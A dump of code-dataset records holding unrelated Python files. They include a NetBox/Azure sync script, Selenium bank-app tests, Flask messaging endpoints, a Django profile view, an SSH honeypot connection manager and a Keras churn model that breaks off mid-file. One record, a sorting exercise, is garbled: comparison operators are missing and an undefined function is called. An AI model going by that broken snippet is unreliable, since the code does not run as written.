except TypeError:\n log.debug(\n \"No %s key was found in the parent prefix. Nulling.\",\n key\n )\n result[key] = None\n log.debug(\n \"IP address %s is a child of prefix %s with the following \"\n \"attributes: %s\", ip_addr, prefix, result\n )\n except IndexError:\n log.debug(\"No parent prefix was found for IP %s.\", ip_addr)\n return result\n\n def verify_dependencies(self):\n \"\"\"\n Validates that all prerequisite NetBox objects exist and creates them.\n \"\"\"\n dependencies = {\n \"platforms\": [\n {\"name\": \"Windows\", \"slug\": \"windows\"},\n {\"name\": \"Linux\", \"slug\": \"linux\"},\n ],\n \"cluster_types\": [\n {\"name\": \"Public Cloud\", \"slug\": \"public-cloud\"}\n ],\n \"cluster_groups\": [\n {\"name\": \"Microsoft Azure\", \"slug\": \"microsoft-azure\"}\n ],\n \"device_roles\": [\n {\n \"name\": \"Server\",\n \"slug\": \"server\",\n \"color\": \"9e9e9e\",\n \"vm_role\": True\n }],\n \"tags\": [\n {\n \"name\": \"Orphaned\",\n \"slug\": \"orphaned\",\n \"color\": \"607d8b\",\n \"comments\": \"This applies to objects that have become \"\n \"orphaned. The source system which has \"\n \"previously provided the object no longer \"\n \"states it exists.{}\".format(\n \" An object with the 'Orphaned' tag will \"\n \"remain in this state until it ages out \"\n \"and is automatically removed.\"\n ) if settings.NB_PRUNE_ENABLED else \"\"\n },\n {\n \"name\": \"Azure\",\n \"slug\": \"azure\",\n \"comments\": \"Objects synced from Azure. Be careful not to \"\n \"modify the name or slug.\"\n }]\n }\n # For each dependency of each type verify object exists\n log.info(\"Verifying all prerequisite objects exist in NetBox.\")\n for dep_type in dependencies:\n log.debug(\n \"Checking NetBox has necessary %s objects.\", dep_type[:-1]\n )\n for dep in dependencies[dep_type]:\n self.obj_exists(nb_obj_type=dep_type, az_data=dep)\n log.info(\"Finished verifying prerequisites.\")\n\n def remove_all(self):\n \"\"\"\n Searches NetBox for all Azure synced objects and then removes them.\n\n This is intended to be used in the case you wish to start fresh or stop\n using the script.\n \"\"\"\n log.info(\n \"Preparing for the removal of all Azure objects synced to NetBox.\"\n )\n nb_obj_types = [\n t for t in self.obj_map if self.obj_map[t][\"prune\"]\n ]\n # Honor pruning preference, highest to lowest\n nb_obj_types = sorted(\n nb_obj_types, key=lambda t: self.obj_map[t][\"prune_pref\"],\n reverse=True\n )\n for nb_obj_type in nb_obj_types:\n log.info(\n \"Collecting all current NetBox %s objects to prepare for \"\n \"deletion.\", nb_obj_type\n )\n nb_objects = self.request(\n req_type=\"get\", nb_obj_type=nb_obj_type,\n query=\"?tag=azure\"\n )[\"results\"]\n # NetBox virtual interfaces do not currently support filtering\n # by tags. Therefore we collect all virtual interfaces and\n # filter them post collection.\n if nb_obj_type == \"virtual_interfaces\":\n log.debug(\"Collected %s virtual interfaces pre-filtering.\")\n nb_objects = [\n obj for obj in nb_objects if \"Azure\" in obj[\"tags\"]\n ]\n log.debug(\n \"Filtered to %s virtual interfaces with 'Azure' tag.\",\n len(nb_objects)\n )\n query_key = self.obj_map[nb_obj_type][\"key\"]\n log.info(\n \"Deleting %s NetBox %s objects.\", len(nb_objects), nb_obj_type\n )\n for obj in nb_objects:\n log.info(\n \"Deleting NetBox %s '%s' object.\", nb_obj_type,\n obj[query_key]\n )\n self.request(\n req_type=\"delete\", nb_obj_type=nb_obj_type,\n nb_id=obj[\"id\"],\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":49691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220801539","text":"import time\nimport unittest\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom Common_Package.BankApp_CommonFunctons import BankAPP_CommonFunctions\nfrom utility import Excelutility\nfrom Functionality_Account.TC_AddAccount import TC_AddAccountTest\n\n\nclass TC_DeleteAccountTest(unittest.TestCase):\n\n Path = BankAPP_CommonFunctions.excelPath\n Sheet_Name = BankAPP_CommonFunctions.sheet_AccountDetails\n Sheet_Verify = BankAPP_CommonFunctions.sheet_CustomerID\n\n # @classmethod\n # def setUpClass(cls):\n # cls.driver = webdriver.Chrome(executable_path=\"E:\\\\chromedriver_win32\\\\chromedriver.exe\")\n # cls.driver.maximize_window()\n # BankAPP_CommonFunctions.login_bankApp(cls.driver, BankAPP_CommonFunctions.username,\n # BankAPP_CommonFunctions.Password)\n # BankAPP_CommonFunctions.close_popup(cls.driver)\n\n @staticmethod\n def create_dummy_account(driver):\n total_row = Excelutility.get_row_count(TC_DeleteAccountTest.Path,TC_DeleteAccountTest.Sheet_Name)\n print(\"Total Row:\",total_row)\n last_cust_id = Excelutility.read_data(TC_DeleteAccountTest.Path,TC_DeleteAccountTest.Sheet_Name,total_row,1)\n print(\"Last Cust Id :\",last_cust_id)\n BankAPP_CommonFunctions.close_popup(driver)\n BankAPP_CommonFunctions.click_menu_by_perform_mouse_action(driver, \"New Acc\", \"new account\")\n TC_AddAccountTest.add_account_details(driver,last_cust_id,\"Savings\",3000)\n TC_AddAccountTest.validate_account_info(driver,\"Savings\",3000)\n total_row_after_addition = Excelutility.get_row_count(TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name)\n print(\"Total row in excel after adding new account:\",total_row_after_addition)\n account_id_to_delete = Excelutility.read_data(TC_DeleteAccountTest.Path,TC_DeleteAccountTest.Sheet_Name,\n total_row_after_addition,2)\n print(\"Account Id to delete is :\",account_id_to_delete)\n return account_id_to_delete\n\n @staticmethod\n def search_acc_BYID_Delete(driver, id, action):\n driver.find_element_by_name(\"accountno\").send_keys(id)\n driver.find_element_by_css_selector(\"input[name='AccSubmit']\").click()\n time.sleep(2)\n msg = driver.switch_to.alert.text\n if \"Do you really want to delete this Account?\" in msg and action == \"No\":\n print(msg)\n driver.switch_to.alert.dismiss()\n elif \"Do you really want to delete this Account?\" in msg and action == \"Yes\":\n print(msg)\n driver.switch_to.alert.accept()\n wait = WebDriverWait(driver, 35)\n wait.until(EC.alert_is_present(), 'Timed out waiting for PA creation ' + 'confirmation popup to appear.')\n msgon_deletion = driver.switch_to.alert.text\n\n if \"Account does not exist\" in msgon_deletion:\n print(msgon_deletion)\n driver.switch_to.alert.accept()\n elif \"Account Deleted Sucessfully\" in msgon_deletion:\n print(msgon_deletion)\n driver.switch_to.alert.accept()\n driver.implicitly_wait(1)\n\n col, row = Excelutility.search_value_in_column(TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name,\n id, \"B\")\n print(\"Row {0},Col {1}:\".format(row, col))\n total_row = Excelutility.get_row_count(TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name)\n print(\"Total Row :\", total_row)\n\n if row != None:\n Excelutility.delete_row(TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name, row, 1)\n\n if Excelutility.get_row_count(TC_DeleteAccountTest.Path,\n TC_DeleteAccountTest.Sheet_Name) == total_row - 1 and Excelutility.read_data(\n TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name, row, 1) != id:\n print(id + \" got deleted from xls\")\n elif Excelutility.get_row_count(TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name) == total_row:\n print(id + \" not found in excel or already deleted!!!\")\n\n '''def test_delete_account(self):\n try:\n account_id_delete = TC_DeleteAccountTest.create_dummy_account(self.driver)\n BankAPP_CommonFunctions.click_menu_by_partial_link_text(self.driver,\"Delete Acc\",\"Delete Account\")\n TC_DeleteAccountTest.search_acc_BYID_Delete(self.driver,account_id_delete,\"Yes\")\n #TC_DeleteAccountTest.search_acc_BYID_Delete(self.driver,\"78433\",\"Yes\")\n except Exception as e:\n print(\"Exception from Delete Account:\", type(e).__name__)\n print('Error on line {} '.format(sys.exc_info()[-1].tb_lineno), type(e).__name__, e)'''\n\n # @classmethod\n # def tearDownClass(cls):\n # BankAPP_CommonFunctions.close_popup(cls.driver)\n # BankAPP_CommonFunctions.logout(cls.driver)\n # cls.driver.implicitly_wait(1)\n # cls.driver.close()\n\n\n# if __name__ == \"__main__\":\n# unittest.main()","sub_path":"Functionality_Account/TC_DeleteAccount.py","file_name":"TC_DeleteAccount.py","file_ext":"py","file_size_in_byte":5198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"6774510","text":"def bubblemax(ls):#从大到小排序\n for i in range(len(ls)-1):\n j=0\n while jls[j+1]:\n ls[j],ls[j+1]=ls[j+1],ls[j]\n j=j+1\n return ls\n\nnums1=input().split(\" \")\nnums2=input().split(\" \")\nk=int(nums2[0])\nm=int(nums2[0])\ns1=input()\ns2=input()\nj=0\nA=[]\nB=[]\nwhile s1.__contains__(\" \"):\n index=s1.index(\" \")\n A.append(int(s1[:index]))\n s1=s1[index+1:]\nA.append(int(s1))\nwhile s2.__contains__(\" \"):\n index=s2.index(\" \")\n B.append(int(s2[:index]))\n s2=s2[index+1:]\nB.append(int(s2))\nA=bubblemin(A)\nB=bubblemax(B)\n\nselectA=A[:k]\nselectB=B[:m]\n\nresult=\"\"\nif max(selectA)len(A) or m>len(B):\n result=\"NO\"\n \nprint(result)\n\n","sub_path":"Code/CodeRecords/2848/60796/276035.py","file_name":"276035.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"443351123","text":"import os\npathRes \t= os.path.abspath(r\"..\\..\\..\\res\")\npathSysRes \t= os.path.abspath(r\"..\\..\\..\\sys\\res\")\n\nDEBUG_PATH = True\n\nif DEBUG_PATH:\n\tpathRes \t= os.path.abspath(r\"../../debug_dir_res\")\n\tif not os.path.isdir(pathRes):\n\t\tpathRes = os.path.abspath(r\"../debug_dir_res\")\n\tpathSysRes \t= pathRes\n\n\n\nif not os.path.isdir(pathRes) or not os.path.isdir(pathSysRes):\n\tpathRes \t= os.path.abspath(r\"..\\..\\..\\..\\res\")\n\tpathSysRes \t= os.path.abspath(r\"..\\..\\..\\..\\sys\\res\")\n\nif not os.path.isdir(pathRes) or not os.path.isdir(pathSysRes):\n\traise ImportError(\"Not found game path, %s\"%pathRes)\n\ntmpWeaponDir = r\"weapons\"\npathWeaponJ = os.path.join(pathRes,r\"scripts\\common\\data\\weapon.json\")\npathWeapon = os.path.join(pathRes,r\"scripts\\common\\data\\weapon.pickle\")\npathLocalRusItemsNames = os.path.join(pathRes, \"local/Russian/ItemsNames.xml\")","sub_path":"widgets/wtsettings.py","file_name":"wtsettings.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"67637172","text":"#!/usr/bin/env python3\n\"\"\"\nAnother input pattern.\n\"\"\" \nPER_GALLON = 200 # A can of paint covers 200 square feet\nsq_ft = 0 \nwhile sq_ft == 0:\n said = input(\"Number of square feet to paint: \")\n if not said: # or if said == '':\n print(\"Thank you anyway.\") \n break\n try:\n sq_ft = int(said)\n except ValueError:\n print(\"Please give a whole number.\")\nelse:\n no_cans = sq_ft//PER_GALLON # // is integer division\n if sq_ft % PER_GALLON > 0: # Leftover after division\n no_cans += 1\n print(f\"You need {sq_ft/PER_GALLON:.1f} cans\"\n \" so you'd better buy\", end= ' ')\n else:\n print(\"You need exactly\", end=' ')\n print(f\"{no_cans} {'can' if no_cans==1 else 'cans'}.\")\n","sub_path":"python3/code/Lab02_input/paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"301563582","text":"import os\nfrom google.appengine.ext import webapp\nfrom util import shared\nfrom model.media import Media\nfrom model.comment import Comment\nfrom google.appengine.api import users\n\nclass Details(webapp.RequestHandler):\n \n def get(self):\n media=self.getMedia(self.request.get('key'))\n if media:\n template_values = {\"media\":media}\n path = os.path.join(os.path.dirname(__file__), '../html/details.html')\n shared.render(self, path, template_values)\n \n \n def post(self):\n media=self.getMedia(self.request.get('key'))\n if media:\n comment=Comment()\n comment.title=self.request.get('title')\n u=users.get_current_user()\n if u:\n comment.by=u.nickname()\n else:\n comment.by=\"Mr. I'm too good to log in\"\n comment.text=self.request.get('text')\n commentkey=self.request.get('commentkey')\n if commentkey:\n comment.op=Comment.get(commentkey)\n else:\n comment.media=media\n comment.put()\n \n template_values = {\"media\":media}\n path = os.path.join(os.path.dirname(__file__), '../html/details.html')\n shared.render(self, path, template_values)\n \n def getMedia(self, key):\n if key:\n return Media.get(key)\n else:\n shared.do404(self)","sub_path":"SocialGuru/PolySocial/action/details.py","file_name":"details.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"539445315","text":"from functools import wraps\n\n\nclass Request:\n def __init__(self):\n self.body = {\n 'username': 'test001',\n 'age': 20.2\n }\n\n\nrequest = Request()\n\n\nclass DotDict(dict):\n \"\"\"使用'点'访问字典属性,无属性时返回None\"\"\"\n\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n\n\nclass Fields:\n def __init__(self, zh_name=None, data_type=None, required=None, max_length=None):\n print('初始')\n self.is_valid = True\n self.error_message = '校验成功'\n self.zh_name = zh_name\n\n self.data_type = data_type\n self.required = required\n self.max_length = max_length\n\n def check_fail(self, error_message, custom=False):\n self.is_valid = False\n if not custom:\n self.error_message = '{}: {}'.format(self.zh_name or '参数', error_message)\n else:\n self.error_message = error_message\n return {\n 'is_valid': self.is_valid,\n 'error_message': self.error_message\n }\n\n @staticmethod\n def check_success():\n return {\n 'is_valid': True,\n 'error_message': '校验成功'\n }\n\n def _check_data_type(self, value):\n if isinstance(value, self.data_type):\n return True\n\n @staticmethod\n def _check_required(value):\n if value is not None or value != '':\n return True\n\n def _check_max_length(self, value):\n # 后期需考虑数据类型(字典、列表)\n return value <= len(str(self.max_length))\n\n def all_check(self, value, *args, **kwargs):\n if self.required:\n if value is None or value == '':\n return self.check_fail('不可为空')\n\n if self.max_length is not None:\n if len(str(value)) > self.max_length:\n return self.check_fail('长度不可大于{}'.format(self.max_length))\n\n return self.check_success()\n\n\nclass CharFields(Fields):\n def __init__(self, *args, **kwargs):\n super(CharFields, self).__init__(*args, **kwargs)\n\n def check(self, value):\n if not isinstance(value, str):\n return self.check_fail('数据类型错误')\n else:\n self.all_check(value)\n\n\nclass Login:\n username = CharFields('用户名', required=True, max_length=10)\n# age = IntegerFields()\n\n\nclass Validate:\n def __init__(self, scheme, data):\n self.scheme = scheme\n self.data = data\n\n def get_result(self):\n result = None\n json_data = DotDict(self.data.body)\n for key in dir(self.scheme)[::-1]:\n if not key.startswith('_'):\n value = json_data.__getattr__(key)\n result = getattr(self.scheme, key).check(value)\n # 加判断,错误时停止检查\n return result\n\n\ndef validator(scheme):\n def validator_decorator(func):\n @wraps(func)\n def wrapper(request):\n checker = Validate(scheme, request)\n result = checker.get_result()\n request.body['is_valid'] = result['is_valid']\n request.body['error_message'] = result['error_message']\n return func(request)\n\n return wrapper\n\n return validator_decorator\n\n# test = Validate(Login, request)\n# @ validator(Login)\n# def ApiLogin(request):\n# print(request.body['is_valid'])\n# print(request.body['error_message'])\n#\n# ApiLogin(request)\n\n\n\n\n\n","sub_path":"tmp1.py","file_name":"tmp1.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"62765326","text":"\"\"\"This module contains logic related to SSH\"\"\"\nimport logging\nimport socket\nimport threading\nfrom time import time\nimport urllib.request\nfrom re import Pattern\nfrom ipaddress import ip_address\nfrom typing import Optional\n\n\nimport paramiko\nfrom paramiko.ssh_exception import SSHException\n\nimport frontend.honeylogger as honeylogger\nfrom frontend.config import config\nfrom ._proxy_handler import ProxyHandler\nfrom ._transport_manager import TransportManager, TransportPair\nfrom ._ssh_server import Server\nfrom frontend.target_systems import TargetSystemProvider\n\nlogger = logging.getLogger(__name__)\n\n\nclass ConnectionManager(threading.Thread):\n \"\"\"ConnectionManager contains logic for listening for TCP connections\n and creating new threads of :class:`frontend.protocols.ssh.ConnectionManager`\"\"\"\n\n # The provider used to acquire target systems for each attacker connection\n _target_system_provider: TargetSystemProvider\n\n def __init__(self,\n target_system_provider: TargetSystemProvider,\n host_key: paramiko.PKey,\n usernames: Optional[Pattern] = None,\n passwords: Optional[Pattern] = None,\n socket_timeout: float = 5,\n max_unaccepted_connetions: int = 100,\n port: int = 22) -> None:\n \"\"\"Creates an instance of the ConnectionManager class which will start listening\n on the given port once the `start` method is called.\n\n\n :param host_key: The public key used by the server\n :param usernames: Allowed usernames, if it is None everything is allowed, defaults to None\n :param passwords: Allowed passwords, if it is None everything is allowed, defaults to None\n :param socket_timeout: The timeout of the socket, defaults to 5\n :param max_unaccepted_connetions: Max unaccepted connections, defaults to 100\n :param port: The port to listen on, defaults to 22\n \"\"\"\n super().__init__(target=self.listen, args=(socket_timeout,), daemon=False)\n self._transport_manager = TransportManager()\n self._target_system_provider = target_system_provider\n self._host_key = host_key\n self._usernames = usernames\n self._passwords = passwords\n self._max_unaccepted_connections = max_unaccepted_connetions\n self._port = port\n\n self._terminate = False\n self._lock = threading.Lock()\n\n self._ip = ip_address(urllib.request.urlopen('https://ident.me').read().decode('utf-8'))\n\n def stop(self) -> None:\n \"\"\"Stops the `listen` method listening for TCP connections\n \"\"\"\n logger.debug(\"Shutting down ConnectionManager\")\n with self._lock:\n self._terminate = True\n\n def start_ssh_server(self, client: socket.socket):\n \"\"\"Starts the SSH server for the givent client\n\n :param client: The socket object of the client connecting\n \"\"\"\n transport = paramiko.Transport(client)\n transport.local_version = config.SSH_LOCAL_VERSION\n transport.add_server_key(self._host_key)\n\n src = client.getpeername()[0]\n src_port = client.getpeername()[1]\n\n session = honeylogger.create_ssh_session(\n src_address=ip_address(src),\n src_port=src_port,\n dst_address=self._ip,\n dst_port=self._port)\n\n proxy_handler = ProxyHandler(session, self._target_system_provider)\n server = Server(\n transport,\n session,\n proxy_handler,\n self._usernames,\n self._passwords)\n\n start_time = time()\n logger.debug('Starting SSH server')\n try:\n transport.start_server(server=server)\n except SSHException:\n logger.exception(\"Failed to start the SSH server for %s\", src)\n return\n except EOFError:\n return\n except Exception as exc:\n logger.exception(\"Failed to start the SSH server for %s\", src, exc_info=exc)\n return\n finally:\n logger.debug('SSH server started in %fs', time()-start_time)\n\n self._transport_manager.add_transport(TransportPair(transport, proxy_handler, server))\n\n def listen(self, socket_timeout: float = 5) -> None:\n \"\"\"Starts listening for TCP connections on the given ports.\n runs new instances of :class:`frontend.protocols.ssh.ConnectionHandler` in new threads.\n\n :param socket_timeout:\n Seconds to wait before timeouting a connection attempt, defaults to 5\n \"\"\"\n try:\n # SOCK_STREAM is TCP\n # AF_INET is IPv4\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # Permit reuse of local addresses for this socket\n # More information on options can be found here\n # https://www.gnu.org/software/libc/manual/html_node/Socket_002dLevel-Options.html\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((\"\", self._port))\n except Exception:\n logger.exception(\"Failed to bind the port %s\", self._port)\n raise\n\n try:\n sock.listen(self._max_unaccepted_connections)\n except Exception:\n logger.exception(\"Failed to listen to the socket\")\n raise\n\n sock.settimeout(socket_timeout)\n while True:\n with self._lock:\n if self._terminate:\n break\n\n # Try accepting connections\n try:\n client, _ = sock.accept()\n except socket.timeout:\n continue\n except Exception:\n logger.exception(\n \"Failed to accept a connection from somewhere\")\n continue\n\n threading.Thread(target=self.start_ssh_server, args=(client,), daemon=True).start()\n\n logger.debug(\"ConnectionManager has shut down\")\n self._transport_manager.stop()\n","sub_path":"frontend/frontend/protocols/ssh/connection_manager.py","file_name":"connection_manager.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"423109011","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.shortcuts import render, get_object_or_404\nfrom store.models import *\nfrom store.decorators import allowed_user\nfrom store.forms import UpdateCustomerForm, UpdateUserForm\n\n\n# menu page\n@login_required(login_url='/login')\n# @allowed_user(allowed_roles=['customer'])\ndef profile(request):\n if request.method == 'POST':\n user_form = UpdateUserForm(request.POST, instance=request.user)\n customer_form = UpdateCustomerForm(request.POST, request.FILES, instance=request.user.customer)\n\n if customer_form.is_valid() and user_form.is_valid():\n if request.FILES.get('profile_pic', False):\n Customer.objects.get(user=request.user).profile_pic.delete(save=True)\n user_form.save()\n customer_form.save()\n messages.success(request, 'Account updated!')\n else:\n messages.error(request, 'Failed to update profile!')\n\n user_details = User.objects.select_related(\"customer\").get(username=request.user)\n customer_form = UpdateCustomerForm(instance=request.user.customer)\n user_form = UpdateUserForm(instance=request.user)\n\n context = {\n 'user_details': user_details,\n 'customer_form': customer_form,\n 'user_form': user_form\n }\n\n return render(request, 'registration/profile.html', context)\n\n\n\n\n","sub_path":"store/views/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151708009","text":"import threading\n\nfrom flask_restful import Resource, request, current_app\nfrom schematics.exceptions import DataError\n\nfrom server.models.dtos.message_dto import MessageDTO\nfrom server.services.messaging.message_service import MessageService, NotFound, MessageServiceError\nfrom server.services.users.authentication_service import token_auth, tm\n\n\nclass ProjectsMessageAll(Resource):\n\n @tm.pm_only()\n @token_auth.login_required\n def post(self, project_id):\n \"\"\"\n Send message to all contributors to a project\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n - name: project_id\n in: path\n description: The unique project ID\n required: true\n type: integer\n default: 1\n - in: body\n name: body\n required: true\n description: JSON object for creating draft project\n schema:\n properties:\n subject:\n type: string\n default: Thanks\n required: true\n message:\n type: string\n default: Thanks for your contribution\n required: true\n responses:\n 200:\n description: All mapped tasks validated\n 401:\n description: Unauthorized - Invalid credentials\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n message_dto = MessageDTO(request.get_json())\n message_dto.from_user_id = tm.authenticated_user_id\n message_dto.validate()\n except DataError as e:\n current_app.logger.error(f'Error validating request: {str(e)}')\n return str(e), 400\n\n try:\n threading.Thread(target=MessageService.send_message_to_all_contributors,\n args=(project_id, message_dto)).start()\n\n return {\"Success\": \"Messages started\"}, 200\n except Exception as e:\n error_msg = f'Send message all - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n\n\nclass HasNewMessages(Resource):\n\n @tm.pm_only(False)\n @token_auth.login_required\n def get(self):\n \"\"\"\n Gets count of unread messages\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n responses:\n 200:\n description: Message info\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n unread_messages = MessageService.has_user_new_messages(tm.authenticated_user_id)\n return unread_messages, 200\n except Exception as e:\n error_msg = f'User GET - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n\n\nclass GetAllMessages(Resource):\n\n @tm.pm_only(False)\n @token_auth.login_required\n def get(self):\n \"\"\"\n Get all messages for logged in user\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n responses:\n 200:\n description: Messages found\n 404:\n description: User has no messages\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n user_messages = MessageService.get_all_messages(tm.authenticated_user_id)\n return user_messages.to_primitive(), 200\n except NotFound:\n return {\"Error\": \"No messages found\"}, 404\n except Exception as e:\n error_msg = f'Messages GET all - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n\n\nclass MessagesAPI(Resource):\n\n @tm.pm_only(False)\n @token_auth.login_required\n def get(self, message_id):\n \"\"\"\n Gets the specified message\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n - name: message_id\n in: path\n description: The unique message\n required: true\n type: integer\n default: 1\n responses:\n 200:\n description: Messages found\n 403:\n description: Forbidden, if user attempting to ready other messages\n 404:\n description: Not found\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n user_message = MessageService.get_message_as_dto(message_id, tm.authenticated_user_id)\n return user_message.to_primitive(), 200\n except MessageServiceError as e:\n return {\"Error\": str(e)}, 403\n except NotFound:\n return {\"Error\": \"No messages found\"}, 404\n except Exception as e:\n error_msg = f'Messages GET all - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n\n @tm.pm_only(False)\n @token_auth.login_required\n def delete(self, message_id):\n \"\"\"\n Deletes the specified message\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n - name: message_id\n in: path\n description: The unique message\n required: true\n type: integer\n default: 1\n responses:\n 200:\n description: Messages found\n 403:\n description: Forbidden, if user attempting to ready other messages\n 404:\n description: Not found\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n MessageService.delete_message(message_id, tm.authenticated_user_id)\n return {\"Success\": \"Message deleted\"}, 200\n except MessageServiceError as e:\n return {\"Error\": str(e)}, 403\n except NotFound:\n return {\"Error\": \"No messages found\"}, 404\n except Exception as e:\n error_msg = f'Messages GET all - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n\n\nclass ResendEmailValidationAPI(Resource):\n\n @tm.pm_only(False)\n @token_auth.login_required\n def post(self):\n \"\"\"\n Resends the validation user to the logged in user\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n responses:\n 200:\n description: Resends the user their email verification email\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n MessageService.resend_email_validation(tm.authenticated_user_id)\n return {\"Success\": \"Verification email resent\"}, 200\n except Exception as e:\n error_msg = f'User GET - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n","sub_path":"server/api/messaging/message_apis.py","file_name":"message_apis.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377169907","text":"# Most of the comments can be removed\n# Libraries should all be imported at the top\n# File is written to learn about the process rather than to be a finished product\n\n# Importing the libraries\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nnp.set_printoptions(threshold=np.inf)\nK = 4\n# np.random.seed(12345) in theory this should make the ANN process repeatable but does not for me\n\n# Importing the dataset & encoding categorical data\ndef load_data():\n dataset = pd.read_csv('~/Deep Learning A-Z/Deep Learning A-Z course/part_1_ANNs/my_implementation/original_input.csv')\n dataset = dataset.drop(columns=[\"RowNumber\", \"CustomerId\", \"Surname\"])\n dataset['Gender'] = dataset['Gender'].replace({'Female': 1, 'Male': 0}) # this is a more specific and naive version of the course's abstraction\n dataset['Country_A'] = dataset.apply(lambda row: 1 if row.Geography == \"France\" else 0, axis=1)\n dataset['Country_B'] = dataset.apply(lambda row: 1 if row.Geography == \"Spain\" else 0, axis=1)\n dataset = dataset.drop(columns=\"Geography\")\n ex = dataset.iloc[:, list(range(9)) + list(range(10,12))].values\n why = dataset.iloc[:, 9].values\n return ex, why\n\n# Plan for next:\n# functionise it\n# separate into test and train before the stratified step - can do cross-validation within the train\nfrom sklearn.model_selection import train_test_split\ndef split_out_test_set(X, y, K):\n return train_test_split(X, y, test_size = 1/(K+1), random_state = 123)\n\nfrom sklearn.model_selection import StratifiedKFold\ndef kfolding_for_cross_validation():\n skf = StratifiedKFold(n_splits=K, random_state=123)\n return skf\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\ndef feature_scale(trainx, testx):\n sc = StandardScaler()\n X_train = sc.fit_transform(trainx) # this saves the values of the mean and standard deviation from the training set - these are then applied to the test set:\n X_test = sc.transform(testx)\n #homework_test = np.array([600, 0, 40, 3, 60000, 2, 1, 1, 50000, 1, 0])\n #homework = sc.transform(homework_test.reshape(1,-1))\n return X_train, X_test #, homework\n\n# Fitting classifier to the Training set\n# Create your classifier here\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\ndef create_ANN_model(optimizer='adam'):\n classifier = Sequential()\n classifier.add(Dense(activation='relu', input_dim=11, units=6, kernel_initializer='uniform')) # Tip is to use the average of input and output number of nodes as the first hidden layer number of nodes\n classifier.add(Dropout(rate=0.1))\n classifier.add(Dense(activation='relu', units=6, kernel_initializer='uniform'))\n classifier.add(Dropout(rate=0.1))\n classifier.add(Dense(activation='sigmoid', units=1, kernel_initializer='uniform')) # if there were multiple outputs then would need to use softmax instead of sigmoid\n classifier.compile(optimizer, loss='binary_crossentropy', metrics=['accuracy']) # categorical_crossentropy if more than two categories\n return classifier\n\ndef train_and_evaluate_model(model, X_train, y_train, X_test, y_test, return_model=0, batch_size=10, epochs=20):\n model.fit(X_train, y_train, batch_size, epochs)\n y_hat = 0\n y_hat = model.predict(X_test)\n y_hat = np.rint(y_hat)\n correct_predictions = 0\n incorrect_predictions = 0\n for index, value in enumerate(y_hat):\n if value 